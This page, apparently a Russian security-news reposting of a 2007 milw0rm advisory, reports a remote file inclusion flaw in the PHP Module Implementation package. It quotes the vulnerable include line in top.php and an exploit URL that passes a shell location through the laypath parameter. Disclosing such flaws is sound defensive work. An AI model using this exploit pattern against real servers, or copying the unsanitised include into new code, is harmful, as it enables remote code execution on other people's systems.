Уведомление о безопасности: PHP Module Implementation(top.php laypath)Remote File Include Vul

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
  SQLiteManager v1.2.0 Multiple Vulnerabilities
  sitex multiple vulnerabilities

From: GolD_M <hacker__(at)_w.cn>
Date: 26 февраля 2007 г.
Subject: PHP Module Implementation(top.php laypath)Remote File Include Vul

*********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul   ^
**********************************************************************
**********************************************************************
Downlaoad S : http://sourceforge.net/projects/phpmip/               ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali] && Contact: HackEr_@W.Cn           ^
**********************************************************************
**********************************************************************
In: /[path]/top.php                                                ^
**********************************************************************
**********************************************************************
Vulnerable Code:                                                    ^
**********************************************************************
**********************************************************************
include("$laypath/body.php");    Line : 23                          ^
**********************************************************************
**********************************************************************
Exploit:                                                            ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell]                           ^
**********************************************************************
**********************************************************************

# milw0rm.com [2007-02-25]

test server